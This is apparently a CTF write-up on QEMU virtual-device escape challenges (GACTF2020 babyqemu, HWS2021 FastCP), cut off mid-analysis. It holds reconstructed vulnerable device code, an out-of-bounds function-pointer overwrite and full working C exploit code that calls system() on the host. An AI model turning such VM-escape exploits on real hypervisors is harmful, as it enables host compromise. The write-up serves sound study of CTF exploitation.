arbitrary_address_read(qemu_leak_addr); size_t qemu_base = *(size_t *)buf - 0x6761b0 ; printf ("[+] qemu base: %#llx\n" , qemu_base); size_t system_plt = qemu_base + 0x2b8a70 ; printf ("[*] system@plt addr: %#llx\n" , system_plt); size_t main_loop_tlg_addr = qemu_base + 0x112cd40 ; printf ("[*] main_loop_tlg addr: %#llx\n" , main_loop_tlg_addr); arbitrary_address_read(main_loop_tlg_addr); size_t QEMUTimerList_addr = *(size_t *)(buf); printf ("[+] QEMUTimerList addr: %#llx\n" , QEMUTimerList_addr); arbitrary_address_read(QEMUTimerList_addr); *(size_t *)(buf + 0x58 ) = system_plt; *(size_t *)(buf + 0x60 ) = QEMUTimerList_addr + 0x200 ; strcpy (buf + 0x200 , "/usr/bin/gnome-calculator" ); arbitrary_address_write(QEMUTimerList_addr); return 0 ; }
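GACTF2020 babyqemu
The virtual machine's password is root.
Environment setup
The exploitation method does not depend on the environment, so the Docker environment was not used. The paths in the launch script need to be changed to relative paths.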
```bash
sudo add-apt-repository ppa:linuxuprising/libpng12
sudo apt install libpng12-0
sudo add-apt-repository universe
sudo apt install libncursesw5
```
When debugging, add the -monitor /dev/null option so that Ctrl-C drops into gdb.
```bash
gdb -args ./qemu-system-x86_64 \
    -kernel ./vmlinuz-4.8.0-52-generic \
    -append "console=ttyS0 root=/dev/ram oops=panic panic=1 quiet" \
    -initrd ./rootfs.cpio \
    -m 2G -nographic \
    -monitor /dev/null \
    -L ./pc-bios -smp 1 \
    -device denc
```
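The reason is that with -nographic, QEMU by default multiplexes the monitor and the serial port onto the current terminal's stdio (equivalent to -serial mon:stdio).
This multiplexed mode puts the terminal into raw mode with ISIG disabled, so pressing Ctrl-C no longer makes the terminal raise SIGINT. It becomes an ordinary byte 0x03 that QEMU or the guest consumes, gdb never receives the interrupt, and it cannot break in.
Adding -monitor /dev/null explicitly turns off the implicit mon:stdio of -nographic: QEMU no longer binds the monitor to the terminal, so it no longer disables signal generation on the terminal or swallows Ctrl-C. Ctrl-C is again delivered as SIGINT, gdb sees it first, and gdb can interrupt and stop the QEMU process being debugged.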
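Vulnerability analysis
The device-related symbols have been stripped. The relevant functions can be located by searching for the string denc-mmio.
There is one junk-instruction sequence (anti-disassembly obfuscation), which can simply be removed.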
```
.text:00000000003AA140 E8 00 00 00 00    call    $+5
.text:00000000003AA145 83 04 24 05       add     dword ptr [rsp], 5
.text:00000000003AA149 C3                retn
```
Part of the challenge code, as reconstructed, is shown below:
```c
#include "qemu/osdep.h"
#include "qapi/error.h"
#include "qemu/module.h"
#include "hw/pci/pci.h"
#include "exec/memory.h"

#define TYPE_PCI_DENC "denc"
OBJECT_DECLARE_SIMPLE_TYPE(DencState, PCI_DENC)

typedef uint64_t (*DencFun)(uint32_t *buf, uint64_t a, uint64_t b);

typedef struct DencState {
    PCIDevice parent_obj;
    MemoryRegion mmio;
    MemoryRegion pmio;
    uint64_t pad;
    uint8_t seed[32];
    uint8_t key[40];
    uint32_t buf[8];   /* 0x20 bytes */
    DencFun fun;       /* immediately follows buf */
} DencState;

static uint64_t denc_mmio_read(void *opaque, hwaddr addr, unsigned size)
{
    DencState *s = opaque;

    if (size != 4 || (addr & 3)) {
        return (uint64_t)-1;
    }
    /* Bug: buf has 8 elements, but offsets 0x20 and 0x24 are accepted too. */
    if (addr <= 0x24) {
        return s->buf[addr >> 2];
    }
    return 0;
}

static void denc_mmio_write(void *opaque, hwaddr addr, uint64_t val, unsigned size)
{
    DencState *s = opaque;

    if (size == 4 && (addr & 3) == 0) {
        /* Same off-by-two-dwords bound as the read handler. */
        if (addr <= 0x24) {
            /* Key offset assumed to equal addr, which matches the exploit
             * (it uses key[addr / 4]). */
            s->buf[addr >> 2] = (uint32_t)val ^ *(uint32_t *)(s->key + addr);
        }
    }
}

static const MemoryRegionOps denc_mmio_ops = {
    .read = denc_mmio_read,
    .write = denc_mmio_write,
    .endianness = DEVICE_NATIVE_ENDIAN,
};

static uint64_t denc_pmio_read(void *opaque, hwaddr addr, unsigned size)
{
    DencState *s = opaque;

    if (size != 4 || (addr & 3)) {
        return (uint64_t)-1;
    }
    if (addr > 0x1F) {
        return 0;
    }
    return s->buf[addr >> 2];
}

static void denc_pmio_write(void *opaque, hwaddr addr, uint64_t val, unsigned size)
{
    DencState *s = opaque;

    if (size == 4 && addr % 4 == 0) {
        if (addr <= 0x1F) {
            /* Key offset assumed to equal addr, as in the MMIO handler. */
            s->buf[addr >> 2] = (uint32_t)val ^ *(uint32_t *)(s->key + addr);
        }
        if (addr == 0x660) {
            /* Calls through the function pointer stored right after buf. */
            s->fun(s->buf, 0, 0);
        }
    }
}

static const MemoryRegionOps denc_pmio_ops = {
    .read = denc_pmio_read,
    .write = denc_pmio_write,
    .endianness = DEVICE_NATIVE_ENDIAN,
};

static void denc_realize(PCIDevice *pdev, Error **errp)
{
    DencState *s = PCI_DENC(pdev);

    /* BAR 0: MMIO region, BAR 1: port I/O region. */
    memory_region_init_io(&s->mmio, OBJECT(s), &denc_mmio_ops, s, "denc-mmio", 0x1000);
    pci_register_bar(pdev, 0, PCI_BASE_ADDRESS_SPACE_MEMORY, &s->mmio);
    memory_region_init_io(&s->pmio, OBJECT(s), &denc_pmio_ops, s, "denc-pmio", 0x1000);
    pci_register_bar(pdev, 1, PCI_BASE_ADDRESS_SPACE_IO, &s->pmio);
}

static void denc_class_init(ObjectClass *klass, void *data)
{
    DeviceClass *dc = DEVICE_CLASS(klass);
    PCIDeviceClass *k = PCI_DEVICE_CLASS(klass);

    k->realize = denc_realize;
    k->vendor_id = 0x1234;
    k->device_id = 0x11E9;
    k->revision = 0x01;
    k->class_id = PCI_CLASS_OTHERS;
    set_bit(DEVICE_CATEGORY_MISC, dc->categories);
}
```
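denc_mmio_read and denc_mmio_write both allow out-of-bounds access: offsets up to 0x24 are accepted, but buf is only 0x20 bytes long, so offsets 0x20 and 0x24 land on the fun function pointer that follows it. Written values are XORed with key, but values read back are not, so the out-of-bounds read can be used first to leak an address directly: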
```c
/* Offsets 0x20/0x24 return the low and high halves of s->fun. */
size_t qemu_base = (mmio_read32(0x20) | (uint64_t)mmio_read32(0x24) << 32) - 0x3a9ea8;
printf("[*] qemu_base: %#zx\n", qemu_base);
size_t system_plt = qemu_base + 0x2ccb60;
printf("[*] system@plt addr: %#zx\n", system_plt);
```
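We can also recover the key for each position by XORing the value written with the value read back. Writing 0 makes this trivial, because the device then stores the key itself: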
```c
uint32_t key[10];
for (int i = 0; i < 10; i++) {
    mmio_write32(i * 4, 0);          /* device stores 0 ^ key[i] */
    key[i] = mmio_read32(i * 4);     /* reads are not XORed */
}
qword_dump("leak key", key, sizeof(key));
```
Then overwrite the function pointer out of bounds and trigger the call:
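```c
/* Padded to 32 bytes so the 4-byte chunks never read past the array. */
char cmd[32] = "/usr/bin/gnome-calculator";
for (size_t i = 0; i < strlen(cmd); i += 4) {
    uint32_t chunk;
    memcpy(&chunk, &cmd[i], sizeof(chunk));
    mmio_write32(i, chunk ^ key[i / 4]);   /* pre-XOR so buf holds the plain string */
}

/* buf[8] and buf[9] alias s->fun: point it at system@plt. */
mmio_write32(8 * 4, (uint32_t)(system_plt & 0xFFFFFFFF) ^ key[8]);
mmio_write32(9 * 4, (uint32_t)(system_plt >> 32) ^ key[9]);

/* A PMIO write to 0x660 calls s->fun(s->buf, 0, 0), i.e. system(buf). */
pio_write32(0x660, 0x114514);
```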
Full exploit
```c
#define _GNU_SOURCE
#include <ctype.h>
#include <errno.h>
#include <fcntl.h>
#include <inttypes.h>
#include <limits.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/io.h>
#include <sys/mman.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <unistd.h>

/* ---------------- Port I/O helpers ---------------- */

#define IORESOURCE_IO 0x00000100ULL

typedef struct {
    uint16_t base;
    uint32_t size;
    uint16_t grant_base;
    uint32_t grant_len;
    bool have_ioperm;
    bool have_iopl;
    bool inited;
} pio_ctx_t;

static pio_ctx_t g_pio = {0};

/* Parse the sysfs "resource" file and pick an I/O BAR (bar_idx < 0: first one). */
static int parse_io_bar(const char *bdf_or_path, int bar_idx,
                        uint16_t *out_base, uint32_t *out_size) {
    char path[256];
    if (strchr(bdf_or_path, '/')) {
        snprintf(path, sizeof(path), "%s", bdf_or_path);
    } else {
        snprintf(path, sizeof(path), "/sys/bus/pci/devices/%s/resource", bdf_or_path);
    }
    FILE *fp = fopen(path, "r");
    if (!fp) return -1;

    int idx = 0, chosen = -1;
    char line[256];
    while (fgets(line, sizeof(line), fp)) {
        unsigned long long start = 0, end = 0, flags = 0;
        if (sscanf(line, "%llx %llx %llx", &start, &end, &flags) != 3) {
            idx++;
            continue;
        }
        bool wanted = (bar_idx >= 0) ? (idx == bar_idx)
                                     : (idx <= 5 && (flags & IORESOURCE_IO));
        if (wanted) {
            if (!(flags & IORESOURCE_IO)) { fclose(fp); errno = EINVAL; return -1; }
            if (end < start || start > 0xFFFFULL) { fclose(fp); errno = ERANGE; return -1; }
            *out_base = (uint16_t)start;
            *out_size = (uint32_t)(end - start + 1);
            chosen = idx;
            break;
        }
        idx++;
    }
    fclose(fp);
    if (chosen < 0) { errno = ENOENT; return -1; }
    return 0;
}

/* Try ioperm() on the BAR range first and fall back to iopl(3). */
static int acquire_io_priv(uint16_t base, uint32_t size,
                           uint16_t *grant_base, uint32_t *grant_len,
                           bool *have_ioperm, bool *have_iopl) {
    uint32_t len = size;
    if ((unsigned)base + len > 0x10000u) len = 0x10000u - base;
    if (len == 0) len = 1;
    if (ioperm(base, len, 1) == 0) {
        *grant_base = base;
        *grant_len = len;
        *have_ioperm = true;
        *have_iopl = false;
        return 0;
    }
    if (iopl(3) == 0) {
        *grant_base = 0;
        *grant_len = 0;
        *have_ioperm = false;
        *have_iopl = true;
        return 0;
    }
    return -1;
}

int pio_init(const char *bdf_or_path, int bar_idx) {
    if (g_pio.inited) { errno = EALREADY; return -1; }
    uint16_t base = 0;
    uint32_t size = 0;
    if (parse_io_bar(bdf_or_path, bar_idx, &base, &size) != 0) return -1;

    uint16_t gbase = 0;
    uint32_t glen = 0;
    bool have_perm = false, have_iopl = false;
    if (acquire_io_priv(base, size, &gbase, &glen, &have_perm, &have_iopl) != 0) return -1;

    g_pio.base = base;
    g_pio.size = size;
    g_pio.grant_base = gbase;
    g_pio.grant_len = glen;
    g_pio.have_ioperm = have_perm;
    g_pio.have_iopl = have_iopl;
    g_pio.inited = true;
    return 0;
}

void pio_fini(void) {
    if (!g_pio.inited) return;
    if (g_pio.have_ioperm) (void)ioperm(g_pio.grant_base, g_pio.grant_len, 0);
    if (g_pio.have_iopl) (void)iopl(0);
    memset(&g_pio, 0, sizeof(g_pio));
}

uint16_t pio_base(void) { return g_pio.base; }
uint32_t pio_size(void) { return g_pio.size; }

/* Translate a BAR-relative offset into an absolute port number. */
static inline int pio_port(uint32_t off, int width, uint16_t *port_out) {
    if (!g_pio.inited) { errno = EPERM; return -1; }
    if ((uint64_t)off + (uint64_t)width > g_pio.size) { errno = ERANGE; return -1; }
    uint32_t p = (uint32_t)g_pio.base + off;
    if (p > 0xFFFFu) { errno = ERANGE; return -1; }
    *port_out = (uint16_t)p;
    return 0;
}

uint8_t pio_read8(uint32_t off) { uint16_t p; if (pio_port(off, 1, &p)) return 0; return inb(p); }
uint16_t pio_read16(uint32_t off) { uint16_t p; if (pio_port(off, 2, &p)) return 0; return inw(p); }
uint32_t pio_read32(uint32_t off) { uint16_t p; if (pio_port(off, 4, &p)) return 0; return inl(p); }
void pio_write8(uint32_t off, uint8_t v) { uint16_t p; if (pio_port(off, 1, &p)) return; outb(v, p); }
void pio_write16(uint32_t off, uint16_t v) { uint16_t p; if (pio_port(off, 2, &p)) return; outw(v, p); }
void pio_write32(uint32_t off, uint32_t v) { uint16_t p; if (pio_port(off, 4, &p)) return; outl(v, p); }

/* ---------------- MMIO helpers ---------------- */

#define IORESOURCE_MEM 0x00000200ULL

typedef struct {
    volatile uint8_t *bar;
    size_t size;
    size_t map_len;
    int fd;
    int res_idx;
    uint64_t phys_start;
    uint64_t phys_end;
    unsigned long long res_flags;
    bool inited;
} mmio_ctx_t;

static mmio_ctx_t g_mmio = {0};

/* Derive the "resource" text file and the device directory from a BDF or a path. */
static int build_paths(const char *bdf_or_path, char *resource_txt, size_t txt_sz,
                       char *dev_dir, size_t dir_sz) {
    if (!bdf_or_path || !*bdf_or_path) { errno = EINVAL; return -1; }
    if (strchr(bdf_or_path, '/')) {
        snprintf(resource_txt, txt_sz, "%s", bdf_or_path);
        snprintf(dev_dir, dir_sz, "%s", bdf_or_path);
        char *slash = strrchr(dev_dir, '/');
        if (!slash) { errno = EINVAL; return -1; }
        *slash = '\0';
        /* A path such as .../resource0 is mapped back to .../resource. */
        if (strstr(resource_txt, "/resource") &&
            resource_txt[strlen(resource_txt) - 1] >= '0' &&
            resource_txt[strlen(resource_txt) - 1] <= '9') {
            snprintf(resource_txt, txt_sz, "%s/resource", dev_dir);
        }
    } else {
        snprintf(resource_txt, txt_sz, "/sys/bus/pci/devices/%s/resource", bdf_or_path);
        snprintf(dev_dir, dir_sz, "/sys/bus/pci/devices/%s", bdf_or_path);
    }
    return 0;
}

/* Pick a memory BAR from the "resource" file (bar_idx < 0: first one). */
static int parse_mem_bar(const char *resource_txt, int bar_idx,
                         unsigned long long *start, unsigned long long *end,
                         unsigned long long *flags, int *picked_idx) {
    FILE *fp = fopen(resource_txt, "r");
    if (!fp) return -1;

    int idx = 0, sel = -1;
    char line[256];
    while (fgets(line, sizeof(line), fp)) {
        unsigned long long s = 0, e = 0, f = 0;
        if (sscanf(line, "%llx %llx %llx", &s, &e, &f) != 3) {
            idx++;
            continue;
        }
        bool wanted = (bar_idx >= 0) ? (idx == bar_idx)
                                     : (idx <= 5 && (f & IORESOURCE_MEM));
        if (wanted) {
            if (!(f & IORESOURCE_MEM)) { fclose(fp); errno = EINVAL; return -1; }
            if (e < s) { fclose(fp); errno = (bar_idx >= 0) ? EINVAL : ERANGE; return -1; }
            sel = idx;
            if (start) *start = s;
            if (end) *end = e;
            if (flags) *flags = f;
            break;
        }
        idx++;
    }
    fclose(fp);
    if (sel < 0) { errno = ENOENT; return -1; }
    if (picked_idx) *picked_idx = sel;
    return 0;
}

int mmio_init(const char *bdf_or_path, int bar_idx) {
    if (g_mmio.inited) { errno = EALREADY; return -1; }

    char resource_txt[PATH_MAX];
    char dev_dir[PATH_MAX];
    if (build_paths(bdf_or_path, resource_txt, sizeof(resource_txt),
                    dev_dir, sizeof(dev_dir)) != 0) return -1;

    unsigned long long start = 0, end = 0, flags = 0;
    int res_idx = -1;
    if (parse_mem_bar(resource_txt, bar_idx, &start, &end, &flags, &res_idx) != 0) return -1;

    size_t size = (size_t)((end - start) + 1ULL);
    size_t pg = (size_t)sysconf(_SC_PAGESIZE);
    size_t map_len = (size + pg - 1) & ~(pg - 1);

    /* Map the BAR through sysfs resourceN. */
    char res_path[PATH_MAX];
    snprintf(res_path, sizeof(res_path), "%s/resource%d", dev_dir, res_idx);
    int fd = open(res_path, O_RDWR | O_SYNC);
    if (fd < 0) return -1;
    void *map = mmap(NULL, map_len, PROT_READ | PROT_WRITE, MAP_SHARED, fd, 0);
    if (map == MAP_FAILED) {
        int sv = errno;
        close(fd);
        errno = sv;
        return -1;
    }

    g_mmio.bar = (volatile uint8_t *)map;
    g_mmio.size = size;
    g_mmio.map_len = map_len;
    g_mmio.fd = fd;
    g_mmio.res_idx = res_idx;
    g_mmio.phys_start = (uint64_t)start;
    g_mmio.phys_end = (uint64_t)end;
    g_mmio.res_flags = flags;
    g_mmio.inited = true;
    return 0;
}

void mmio_fini(void) {
    if (!g_mmio.inited) return;
    if (g_mmio.bar) munmap((void *)g_mmio.bar, g_mmio.map_len);
    if (g_mmio.fd >= 0) close(g_mmio.fd);
    memset(&g_mmio, 0, sizeof(g_mmio));
}

volatile void *mmio_base(void) { return g_mmio.bar; }
size_t mmio_size(void) { return g_mmio.size; }
int mmio_bar_index(void) { return g_mmio.res_idx; }
uint64_t mmio_phys_base(void) { return g_mmio.phys_start; }
uint64_t mmio_phys_limit(void) { return g_mmio.phys_end; }

uint64_t mmio_offset_to_phys(size_t off) {
    if (!g_mmio.inited) { errno = EPERM; return 0; }
    if (off >= g_mmio.size) { errno = ERANGE; return 0; }
    return g_mmio.phys_start + (uint64_t)off;
}

uint64_t mmio_virt_to_phys(const void *p) {
    if (!g_mmio.inited || !p) { errno = EPERM; return 0; }
    uintptr_t base = (uintptr_t)g_mmio.bar;
    uintptr_t addr = (uintptr_t)p;
    if (addr < base || addr >= base + g_mmio.size) { errno = EINVAL; return 0; }
    size_t off = (size_t)(addr - base);
    return g_mmio.phys_start + (uint64_t)off;
}

/* Bounds check shared by all MMIO accessors. */
static inline int chk(size_t off, size_t width) {
    if (!g_mmio.inited) { errno = EPERM; return -1; }
    if (off + width > g_mmio.size) { errno = ERANGE; return -1; }
    return 0;
}

uint8_t mmio_read8(size_t off) { if (chk(off, 1)) return 0; return *(volatile uint8_t *)(g_mmio.bar + off); }
uint16_t mmio_read16(size_t off) { if (chk(off, 2)) return 0; return *(volatile uint16_t *)(g_mmio.bar + off); }
uint32_t mmio_read32(size_t off) { if (chk(off, 4)) return 0; return *(volatile uint32_t *)(g_mmio.bar + off); }
uint64_t mmio_read64(size_t off) { if (chk(off, 8)) return 0; return *(volatile uint64_t *)(g_mmio.bar + off); }
void mmio_write8(size_t off, uint8_t v) { if (chk(off, 1)) return; *(volatile uint8_t *)(g_mmio.bar + off) = v; }
void mmio_write16(size_t off, uint16_t v) { if (chk(off, 2)) return; *(volatile uint16_t *)(g_mmio.bar + off) = v; }
void mmio_write32(size_t off, uint32_t v) { if (chk(off, 4)) return; *(volatile uint32_t *)(g_mmio.bar + off) = v; }
void mmio_write64(size_t off, uint64_t v) { if (chk(off, 8)) return; *(volatile uint64_t *)(g_mmio.bar + off) = v; }

volatile void *mmio_ptr(size_t off) {
    if (chk(off, 1)) return NULL;
    return (volatile void *)(g_mmio.bar + off);
}

/* ---------------- Debug helper ---------------- */

/* Hex dump, four qwords per row, followed by the printable characters. */
void qword_dump(char *desc, void *addr, int len) {
    uint64_t *buf64 = (uint64_t *)addr;
    uint8_t *buf8 = (uint8_t *)addr;
    if (desc != NULL) {
        printf("[*] %s:\n", desc);
    }
    for (int i = 0; i < len / 8; i += 4) {
        printf(" %04x", i * 8);
        for (int j = 0; j < 4; j++) {
            if (i + j < len / 8) {
                printf(" 0x%016" PRIx64, buf64[i + j]);
            } else {
                printf("%19s", "");
            }
        }
        printf(" ");
        for (int j = 0; j < 32 && j + i * 8 < len; j++) {
            printf("%c", isprint(buf8[i * 8 + j]) ? buf8[i * 8 + j] : '.');
        }
        puts("");
    }
}

/* ---------------- Exploit ---------------- */

int main(int argc, char *argv[]) {
    if (mmio_init("0000:00:04.0", 0) != 0 || pio_init("0000:00:04.0", 1) != 0) {
        perror("init");
        return 1;
    }

    /* 1. Leak s->fun through the out-of-bounds read at 0x20/0x24. */
    size_t qemu_base = (mmio_read32(0x20) | (uint64_t)mmio_read32(0x24) << 32) - 0x3a9ea8;
    printf("[*] qemu_base: %#zx\n", qemu_base);
    size_t system_plt = qemu_base + 0x2ccb60;
    printf("[*] system@plt addr: %#zx\n", system_plt);

    /* 2. Recover the key: writing 0 stores the key, and reads are not XORed. */
    uint32_t key[10];
    for (int i = 0; i < 10; i++) {
        mmio_write32(i * 4, 0);
        key[i] = mmio_read32(i * 4);
    }
    qword_dump("leak key", key, sizeof(key));

    /* 3. Place the command string in buf (padded so chunk reads stay in bounds). */
    char cmd[32] = "/usr/bin/gnome-calculator";
    for (size_t i = 0; i < strlen(cmd); i += 4) {
        uint32_t chunk;
        memcpy(&chunk, &cmd[i], sizeof(chunk));
        mmio_write32(i, chunk ^ key[i / 4]);
    }

    /* 4. Overwrite s->fun with system@plt and trigger s->fun(s->buf, 0, 0). */
    mmio_write32(8 * 4, (uint32_t)(system_plt & 0xFFFFFFFF) ^ key[8]);
    mmio_write32(9 * 4, (uint32_t)(system_plt >> 32) ^ key[9]);
    pio_write32(0x660, 0x114514);

    return 0;
}
```
HWS2021 FastCP
Environment setup
```bash
sudo apt install -y libjpeg62
```
Vulnerability analysis
```c
#include "qemu/osdep.h"
#include "hw/pci/pci.h"
#include "hw/pci/msi.h"
#include "hw/qdev-core.h"
#include "qapi/error.h"
#include "qemu/timer.h"
#include "exec/memory.h"
#include "hw/irq.h"
#include "qemu/module.h"
#include "qom/object.h"

#define TYPE_FASTCP "FastCP"
OBJECT_DECLARE_SIMPLE_TYPE(FastCPState, FASTCP)

#define FASTCP_CMD_LIST (1ULL << 0)
#define FASTCP_CMD_PULL (1ULL << 1)
#define FASTCP_CMD_PUSH (1ULL << 2)
#define FASTCP_CMD_IRQ  (1ULL << 3)

#define FASTCP_IRQ_STATUS_COMPLETE 0x100u
#define FASTCP_MMIO_SIZE   (0x100000ULL)
#define FASTCP_TIMER_SCALE 1000000

typedef struct CP_state {
    uint64_t CP_list_src;
    uint64_t CP_list_cnt;
    uint64_t cmd;
} CP_state;

typedef struct FastCP_CP_INFO {
    uint64_t CP_src;
    uint64_t CP_cnt;
    uint64_t CP_dst;
} FastCP_CP_INFO;

typedef struct FastCPState {
    PCIDevice pdev;
    MemoryRegion mmio;
    CP_state cp_state;
    uint8_t handling;
    uint8_t _pad[3];
    uint32_t irq_status;
    char CP_buffer[0x1000];
    QEMUTimer cp_timer;     /* directly follows CP_buffer */
} FastCPState;

static uint64_t fastcp_mmio_read(void *opaque, hwaddr addr, unsigned size);
static void fastcp_mmio_write(void *opaque, hwaddr addr, uint64_t val, unsigned size);
static void fastcp_cp_timer(void *opaque);

static const MemoryRegionOps fastcp_mmio_ops = {
    .read = fastcp_mmio_read,
    .write = fastcp_mmio_write,
    .endianness = DEVICE_NATIVE_ENDIAN,
    .valid = { .max_access_size = 8, },
    .impl = { .max_access_size = 8, },
};

static void pci_FastCP_uninit(PCIDevice *pdev);
static void pci_FastCP_realize(PCIDevice *pdev, Error **errp);

static void FastCP_class_init(ObjectClass *oc, void *data)
{
    DeviceClass *dc = DEVICE_CLASS(oc);
    PCIDeviceClass *k = PCI_DEVICE_CLASS(oc);

    k->vendor_id = 0xDEAD;
    k->device_id = 0xBEEF;
    k->revision = 1;
    k->realize = pci_FastCP_realize;
    k->exit = pci_FastCP_uninit;
    k->class_id = PCI_CLASS_OTHERS;
    dc->categories[0] |= 0x80;
}

static void FastCP_instance_init(Object *obj)
{
    FastCPState *s = FASTCP(obj);

    memset(s->CP_buffer, 0, sizeof(s->CP_buffer));
    s->cp_state.CP_list_src = 0;
    s->cp_state.CP_list_cnt = 0;
    s->cp_state.cmd = 0;
    s->handling = 0;
    s->irq_status = 0;
}

static void pci_FastCP_uninit(PCIDevice *pdev)
{
    FastCPState *s = FASTCP(pdev);

    timer_del(&s->cp_timer);
    msi_uninit(pdev);
}

static void pci_FastCP_realize(PCIDevice *pdev, Error **errp)
{
    FastCPState *s = FASTCP(pdev);

    pdev->config[61] = 1;   /* PCI_INTERRUPT_PIN */
    if (!msi_init(pdev, 0, 1, 1, false, errp)) {
        timer_init_full(&s->cp_timer, NULL, QEMU_CLOCK_VIRTUAL,
                        FASTCP_TIMER_SCALE, 0, fastcp_cp_timer, s);
        memory_region_init_io(&s->mmio, OBJECT(&s->pdev.qdev), &fastcp_mmio_ops,
                              s, "fastcp-mmio", FASTCP_MMIO_SIZE);
        pci_register_bar(pdev, 0, 0, &s->mmio);
        s->irq_status = 0;
    }
}

/* Registers: 0x00 handling, 0x08 CP_list_src, 0x10 CP_list_cnt, 0x18 cmd. */
static uint64_t fastcp_mmio_read(void *opaque, hwaddr addr, unsigned size)
{
    FastCPState *s = opaque;

    if (size != 8 || addr > 0x1F) {
        return ~0ULL;
    }
    switch (addr) {
    case 0x00: return s->handling;
    case 0x08: return s->cp_state.CP_list_src;
    case 0x10: return s->cp_state.CP_list_cnt;
    case 0x18: return s->cp_state.cmd;
    default:   return ~0ULL;
    }
}

static void fastcp_mmio_write(void *opaque, hwaddr addr, uint64_t val, unsigned size)
{
    FastCPState *s = opaque;

    if (addr <= 0x1F && size == 8) {
        if (addr == 0x10) {
            if (s->handling != 1) {
                s->cp_state.CP_list_cnt = val;
            }
        } else if (addr == 0x18) {
            if (s->handling != 1) {
                /* Writing cmd arms the timer; the copy runs in fastcp_cp_timer. */
                s->cp_state.cmd = val;
                int64_t now_ns = qemu_clock_get_ns(QEMU_CLOCK_VIRTUAL);
                timer_mod(&s->cp_timer, now_ns / 1000000 + 100);
            }
        } else if (addr == 0x08) {
            if (s->handling != 1) {
                s->cp_state.CP_list_src = val;
            }
        }
    }
}

static inline void fastcp_raise_irq(FastCPState *s)
{
    s->irq_status |= FASTCP_IRQ_STATUS_COMPLETE;
    if (msi_enabled(&s->pdev)) {
        msi_notify(&s->pdev, 0);
    } else {
        pci_set_irq(&s->pdev, 1);
    }
}

static inline void fastcp_clear_bits_then_maybe_irq(FastCPState *s, uint64_t bits_to_clear)
{
    s->cp_state.cmd &= ~bits_to_clear;
    if (s->cp_state.cmd & FASTCP_CMD_IRQ) {
        fastcp_raise_irq(s);
    }
}

static void fastcp_cp_timer(void *opaque)
{
    FastCPState *s = opaque;
    uint64_t cmd = s->cp_state.cmd;
    FastCP_CP_INFO cp_info;

    memset(&cp_info, 0, sizeof(cp_info));

    switch (cmd) {
    case FASTCP_CMD_PULL: {
        bool one = (s->cp_state.CP_list_cnt == 1);
        s->handling = 1;
        if (one) {
            cpu_physical_memory_rw(s->cp_state.CP_list_src, &cp_info,
                                   sizeof(FastCP_CP_INFO), 0);
            /* Length is checked on this path. */
            if (cp_info.CP_cnt > 0x1000) {
                fastcp_clear_bits_then_maybe_irq(s, FASTCP_CMD_LIST | FASTCP_CMD_PULL);
                s->handling = 0;
                return;
            }
            cpu_physical_memory_rw(cp_info.CP_src, s->CP_buffer, cp_info.CP_cnt, 0);
        }
        break;
    }
    case FASTCP_CMD_PUSH: {
        bool one = (s->cp_state.CP_list_cnt == 1);
        s->handling = 1;
        if (one) {
            cpu_physical_memory_rw(s->cp_state.CP_list_src, &cp_info,
                                   sizeof(FastCP_CP_INFO), 0);
            /* No check of CP_cnt: reads past CP_buffer into guest memory. */
            cpu_physical_memory_rw(cp_info.CP_dst, s->CP_buffer, cp_info.CP_cnt, 1);
            fastcp_clear_bits_then_maybe_irq(s, FASTCP_CMD_LIST | FASTCP_CMD_PULL |
                                                FASTCP_CMD_PUSH);
            s->handling = 0;
            return;
        }
        break;
    }
    case FASTCP_CMD_LIST: {
        uint64_t cnt = s->cp_state.CP_list_cnt;
        s->handling = 1;
        if (cnt > 0x10) {
            /* No check of CP_cnt on this path either. */
            uint64_t i = 0;
            do {
                FastCP_CP_INFO item;
                cpu_physical_memory_rw(s->cp_state.CP_list_src + sizeof(FastCP_CP_INFO) * i,
                                       &item, sizeof(FastCP_CP_INFO), 0);
                cpu_physical_memory_rw(item.CP_src, s->CP_buffer, item.CP_cnt, 0);
                cpu_physical_memory_rw(item.CP_dst, s->CP_buffer, item.CP_cnt, 1);
                i++;
            } while (s->cp_state.CP_list_cnt > i);
        } else {
            if (cnt == 0) {
                fastcp_clear_bits_then_maybe_irq(s, FASTCP_CMD_LIST);
                s->handling = 0;
                return;
            }
            /* First pass: validate every entry's CP_cnt. */
            uint64_t off = 0, seen = 0;
            while (1) {
                FastCP_CP_INFO tmp;
                cpu_physical_memory_rw(s->cp_state.CP_list_src + off, &tmp,
                                       sizeof(FastCP_CP_INFO), 0);
                if (tmp.CP_cnt > 0x1000) {
                    fastcp_clear_bits_then_maybe_irq(s, FASTCP_CMD_LIST);
                    s->handling = 0;
                    return;
                }
                seen++;
                off += sizeof(FastCP_CP_INFO);
                if (seen >= s->cp_state.CP_list_cnt) {
                    if (s->cp_state.CP_list_cnt == 0) {
                        break;
                    }
                    /* Second pass: perform the copies. */
                    uint64_t i = 0;
                    do {
                        FastCP_CP_INFO item;
                        cpu_physical_memory_rw(s->cp_state.CP_list_src +
                                                   sizeof(FastCP_CP_INFO) * i,
                                               &item, sizeof(FastCP_CP_INFO), 0);
                        cpu_physical_memory_rw(item.CP_src, s->CP_buffer, item.CP_cnt, 0);
                        cpu_physical_memory_rw(item.CP_dst, s->CP_buffer, item.CP_cnt, 1);
                        i++;
                    } while (s->cp_state.CP_list_cnt > i);
                    break;
                }
            }
        }
        fastcp_clear_bits_then_maybe_irq(s, FASTCP_CMD_LIST);
        s->handling = 0;
        return;
    }
    default:
        return;
    }

    s->cp_state.cmd = 0;
    s->handling = 0;
}

static const TypeInfo fastcp_info = {
    .name = TYPE_FASTCP,
    .parent = TYPE_PCI_DEVICE,
    .instance_size = sizeof(FastCPState),
    .instance_init = FastCP_instance_init,
    .class_init = FastCP_class_init,
};

static void pci_FastCP_register_types(void)
{
    type_register_static(&fastcp_info);
}

type_init(pci_FastCP_register_types)
```
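In fastcp_cp_timer, neither case 4 (FASTCP_CMD_PUSH) nor the cnt > 0x10 branch of case 1 (FASTCP_CMD_LIST) checks the copy length CP_cnt against the 0x1000-byte CP_buffer, so both allow out-of-bounds reads and writes.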
```c
case FASTCP_CMD_PUSH: {
    bool one = (s->cp_state.CP_list_cnt == 1);
    s->handling = 1;
    if (one) {
        cpu_physical_memory_rw(s->cp_state.CP_list_src, &cp_info,
                               sizeof(FastCP_CP_INFO), 0);
        /* CP_cnt is used without any bound. */
        cpu_physical_memory_rw(cp_info.CP_dst, s->CP_buffer, cp_info.CP_cnt, 1);
